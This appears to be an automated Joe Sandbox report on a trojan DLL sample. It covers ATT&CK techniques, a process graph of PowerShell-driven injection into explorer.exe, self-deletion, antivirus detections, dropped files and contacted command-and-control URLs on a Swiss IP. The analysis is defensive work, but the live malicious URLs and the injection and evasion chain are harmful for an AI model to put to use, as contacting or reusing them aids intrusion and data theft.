                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets11
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection                      		DCSync3
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem1
                      Application Window Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      Remote System Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 634419 Sample: lokvQRcUe0 Startdate: 26/05/2022 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 60 3 other signatures 2->60 9 loaddll32.exe 1 2->9         started        11 mshta.exe 19 2->11         started        process3 process4 13 cmd.exe 1 9->13         started        15 WerFault.exe 2 9 9->15         started        17 WerFault.exe 3 9 9->17         started        19 WerFault.exe 3 9 9->19         started        21 powershell.exe 32 11->21         started        signatures5 24 rundll32.exe 1 6 13->24         started        62 Injects code into the Windows Explorer (explorer.exe) 21->62 64 Writes to foreign memory regions 21->64 66 Modifies the context of a thread in another process (thread injection) 21->66 68 2 other signatures 21->68 28 explorer.exe 21->28 injected 30 csc.exe 3 21->30         started        33 csc.exe 3 21->33         started        35 conhost.exe 21->35         started        process6 dnsIp7 52 176.10.119.68, 49752, 80 AS-SOFTPLUSCH Switzerland 24->52 78 System process connects to network (likely due to code injection or exploit) 24->78 80 Writes to foreign memory regions 24->80 82 Allocates memory in foreign processes 24->82 90 2 other signatures 24->90 37 control.exe 24->37         started        84 Changes memory attributes in foreign processes to executable or writable 28->84 86 Self deletion via cmd delete 28->86 88 Modifies the context of a thread in another process (thread injection) 28->88 92 2 other signatures 28->92 40 cmd.exe 28->40         started        48 C:\Users\user\AppData\Local\...\b5khtopv.dll, PE32 30->48 dropped 42 cvtres.exe 1 30->42         started        50 C:\Users\user\AppData\Local\...\kikzslfg.dll, PE32 33->50 dropped 44 cvtres.exe 33->44         started        file8 signatures9 process10 signatures11 70 Changes memory attributes in foreign processes to executable or writable 37->70 72 Injects code into the Windows Explorer (explorer.exe) 37->72 74 Writes to foreign memory regions 37->74 76 4 other signatures 37->76 46 conhost.exe 40->46         started        process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      lokvQRcUe0.dll49%ReversingLabsWin32.Trojan.Lazy
                      lokvQRcUe0.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.4a10000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/100%Avira URL Cloudphishing
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlk100%Avira URL Cloudphishing
                      http://schemas.mi0%URL Reputationsafe
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZ100%Avira URL Cloudphishing
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://schemas.micr0%URL Reputationsafe
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlk100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlk100%Avira URL Cloudphishing
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/100%Avira URL Cloudphishing

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/_2FmDlfehB0OE/55WbV2nc/Y1h6ZuuUoh7qBwh_2BKlp0h/7L71gn0m4N/M3O3_2Bd4FYKhYEVp/A8X6IhSGaeKc/I6s_2F23qvp/A182DdgYpCpMIP/aP_2Bjsdht_2BJDxnVcIh/PpumD61sg3b7UjUn/NBCGMFNbIjiYANW/kV_2FL6Gv2Uv63EZQh/O7ekDFjPj/xu59b1S5vDi1BLf/OCWp.jlktrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/ocdHPIhqa/Hd8nJGo602uQ7riR5fk1/MgjZVgxWOeylhsm3UIe/ODtnBqntkfEzg6CGz22IMX/BqT5RhbEJCnRP/ZVkWQu9C/sR0fuByflYkig33702ZG3_2/FhdyARm9Lc/m4Hi2C6HqRM3XSnPm/LWaA4HaxDqj7/QbfVKFZGMWq/c7MJSNfi8K7i7w/7kd2UCa_2BF/87zDgqk.jlktrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZESMvd_2FR_2/FFgtmhXbR0ktwUdCXR2Pki/d8dU8ADU_2BI_/2BU31aFd/LiJXzwK_2BCmcWBI_2FSoW9/MydpZhmci7/DHFwznBk9lsaelX7d/OI_2F8mRA8r8/Ql7ZjpWXuIe/emON9m2OO9PUY_/2BZvNnjbqlcKSvSy4k903/VSDqqfhLnxG6SlxI/F80QTh1QnWNOnio/sWTgXKrMs/py.jlktrue
                      • Avira URL Cloud: phishing
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://176.10.119.68/drew/6MD_2BLHj/Wwe7k6B1I0SM4estiKA8/spcFGasNn3hHiGKNKAO/_2B1ah_2BmpCz0i3Swrw7w/rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://schemas.miexplorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://176.10.119.68/drew/TXnzVImnT660oDz/yMOCYK8RDAglTpu9ac/GwxTcb_2B/tHjr3EGRXu7rtpqrdyIg/MBYax8JZrundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.micrexplorer.exe, 00000025.00000000.451810550.000000000DA9A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.439575286.000000000DA70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.422484159.000000000DA70000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://176.10.119.68/drew/8_2BLR3ULj9eEHGwEQ4wR/XNnJzaTlQzupEc1E/13YAC3A_2FwsRXQ/gU_2FKH8C0dGIfymyx/rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      176.10.119.68
                      		unknownSwitzerland
                      		51395AS-SOFTPLUSCHtrue

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:634419
                      Start date and time: 26/05/202204:05:062022-05-26 04:05:06 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 13m 20s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:lokvQRcUe0 (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:45
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:1
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@27/28@0/1
                      EGA Information:
                      • Successful, ratio: 75%
                      HDC Information:
                      • Successful, ratio: 23.4% (good quality ratio 21.2%)
                      • Quality average: 78.1%
                      • Quality standard deviation: 32.4%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 143
                      • Number of non-executed functions: 210
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.42.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6356 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      04:06:17API Interceptor2x Sleep call for process: WerFault.exe modified
                      04:07:05API Interceptor42x Sleep call for process: powershell.exe modified
                      04:07:51API Interceptor1x Sleep call for process: control.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      176.10.119.68zs5n5sI6N2.dllGet hashmaliciousBrowse
                        628df1368bdb5.dllGet hashmaliciousBrowse

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          AS-SOFTPLUSCHzs5n5sI6N2.dllGet hashmaliciousBrowse
                          • 176.10.119.68
                          628df1368bdb5.dllGet hashmaliciousBrowse
                          • 176.10.119.68
                          PE ID & DLT TEMPLATE.exeGet hashmaliciousBrowse
                          • 91.192.100.5
                          Payment Slip 01.exeGet hashmaliciousBrowse
                          • 91.192.100.5
                          bank_payment-doc.exeGet hashmaliciousBrowse
                          • 91.192.102.107
                          BJp3aUvrt9.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          62835e34e60c1.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          62835e34e60c1.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          P5ASinnD4i.exeGet hashmaliciousBrowse
                          • 176.10.119.117
                          5A30ie6lsZ.exeGet hashmaliciousBrowse
                          • 176.10.119.117
                          OIpCcXM6Y5.exeGet hashmaliciousBrowse
                          • 176.10.119.117
                          xaj0e933Uv.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          tIJVb0BvkI.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          XoVzWJQAQ0.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          qOfIxt1fnQ.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          2oCOO5LbPu.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          rXN8OIpbzz.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          GlJdt15gDI.dllGet hashmaliciousBrowse
                          • 185.189.151.28
                          o52M6ZqBFpGet hashmaliciousBrowse
                          • 176.10.116.173
                          com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                          • 176.10.119.156

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_13ec5c98984773435626ad7d5b7558cb4938ccf_7cac0383_19b2f365\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.7489367348203112
                          Encrypted:false
                          SSDEEP:96:DvF+1InYyGy9haot7JnOpXIQcQac6pcEccw35+a+z+HbHgoownOgtYsXqOEX/vF1:jdn+H0tGtjbq/u7sLS274ItW
                          MD5:D5E7A810266C0360B05ABAA90325D05D
                          SHA1:26D18F5B23A1A41BED2465ED47F56D889D45010F
                          SHA-256:BD534CC31EF9CC02A34C0181EE7BD9C6DC12CB6CE93A0A113FF1B837950BCE1B
                          SHA-512:EEE5A73BD400EC913B2C795B18CD7D0DB001FCE986F0B8C20455D0A99BA83FC9137FFAC403B6B063388B7C576564F01707119E683E18C8BC91A6ADEA07A5B9B0
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.0.3.6.7.7.4.9.5.4.4.0.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.8.0.3.6.7.7.6.2.6.6.8.8.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.6.f.4.0.5.5.-.1.5.6.9.-.4.3.b.7.-.b.3.c.a.-.e.a.a.8.d.7.0.e.0.3.a.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.8.e.0.f.6.6.-.3.5.a.c.-.4.b.1.b.-.8.d.8.6.-.8.2.5.7.b.d.9.1.6.5.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.d.0.-.0.0.0.1.-.0.0.1.d.-.9.0.1.2.-.a.6.9.9.f.0.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_b0f1b17d9a16ab43633fff1f39c444c106187da_7cac0383_1942e1c1\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.7418279470653837
                          Encrypted:false
                          SSDEEP:96:+ClInYyPy9haVCj+ASZpXIQcQac6pcEccw35+a+z+HbHgoownOgtYsXqOEX/vFOp:ynVH0tGtjbq/u7sLS274Itb
                          MD5:3C1FCD749BF12D3B7F2A8EEBF75E74B3
                          SHA1:1B8F8C88D17B723C18848FBDDE88947D746E5879
                          SHA-256:DFC470A575DB0CDD9697D1DBA1B935F0B4B0B5B9E565CE181A8171F29C9CC9BC
                          SHA-512:3B12A45EDCE87B8CF0834DA52756F7A21C280F08E135ED51BE58F29040C3D05EED9C31A680A2611CD8866C20AADC8C5DEDD1FBB1DD5D4662B1C37D1633E2F64B
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.0.3.6.7.7.1.7.0.2.3.5.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.4.9.2.b.6.8.-.7.d.b.7.-.4.3.1.9.-.a.a.7.a.-.7.4.3.5.9.3.b.a.c.e.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.6.3.a.4.d.7.-.4.a.5.e.-.4.2.1.c.-.8.5.3.7.-.5.6.8.8.c.2.7.8.a.e.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.d.0.-.0.0.0.1.-.0.0.1.d.-.9.0.1.2.-.a.6.9.9.f.0.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_ffc671f5cc13577c9afdbbe1a48667719c593ee_7cac0383_1adf0343\Report.wer

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.7452135127368718
                          Encrypted:false
                          SSDEEP:96:aFTFydZInYyGy9haVCjmfspXIQcQl8c6npbcE7cw3C+a+z+HbHgoownOgtYsXqO1:apganTH78tbBEjbq/u7swS274ItW
                          MD5:4676BB18681C3F440D8E111849E76E52
                          SHA1:D3D4935FA6C9E4F4C734124509543F11E309B318
                          SHA-256:C95EA7E8ED353FA50E442995B539984CFFC545E9A213680B0343DA40A3656D83
                          SHA-512:7A07D8AF9ADA4514A82A60D29ED48744503049C4BB4648BE24941D5E2DCFFB5F332355BB901E9CE1A3FA3297B6FBA67FB9CA5311AACE78F14B1B3AD66571C90D
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.8.0.3.6.7.7.9.6.6.8.9.1.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.8.0.3.6.7.8.0.8.0.9.5.3.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.0.c.9.6.2.5.-.a.a.7.d.-.4.9.3.8.-.9.c.b.5.-.7.2.b.4.a.8.7.4.2.b.5.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.2.d.5.a.e.1.-.3.d.6.8.-.4.4.d.a.-.a.8.7.0.-.6.0.5.d.f.4.c.1.3.d.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.d.0.-.0.0.0.1.-.0.0.1.d.-.9.0.1.2.-.a.6.9.9.f.0.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC52.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu May 26 11:06:12 2022, 0x1205a4 type
                          Category:dropped
                          Size (bytes):37522
                          Entropy (8bit):1.952483435461223
                          Encrypted:false
                          SSDEEP:96:5J8oq8M/2+Nz+Poi7SfCBFRME2SBaMVIabT5duzDAKqBTsFWInWIBgI4jJTGRc8V:wf2+NZOSFWxphdumXjdGRc8U0fOz
                          MD5:07ABE710E329FCA3C299AFAD1AE79C0E
                          SHA1:10361EDE3FF7B9E104006CC3F462F6D6EAA30AF1
                          SHA-256:1EB35B201DEFCE33CCF6F97DDBABB1756743AAED90DA40913BE6F739B34722E4
                          SHA-512:BD31BDEA614708437CDB80ED706EAAE231110A2030F24E1136D42727E4743EC6450C7C6ECF0386EF9F19F0298B2924E3B555C1A0AD725F9CAD4AC6AE7B77A181
                          Malicious:false
                          Preview:MDMP....... .......$_.b........................L...........$...............~!..........`.......8...........T...........................................................................................................U...........B..............GenuineIntelW...........T............_.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF03.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8346
                          Entropy (8bit):3.6923276777881933
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNiA+6bfucF6YWVSUqF8gmfbSt9CpNj89bEO1fyMm:RrlsNi56aW6YkSUqF8gmfbSFEEf4
                          MD5:32B1D05D43DA3F9AAD3868BEEB87391A
                          SHA1:3C98CEA62445036A6FC570DFC3BEDCAFE965367D
                          SHA-256:5D5FFC18AD55E5082682182FC83ABA21FA70577698258F54337209AA203600D2
                          SHA-512:9268517336F84A7FA1E3AF9DD6831D83A64A05E62B94D670640D5A3FEA8F4A3E4AA33F294590858D5C1B9F48157BCC595B5EAB4524BD215A73088D3D9ED3FAEE
                          Malicious:false
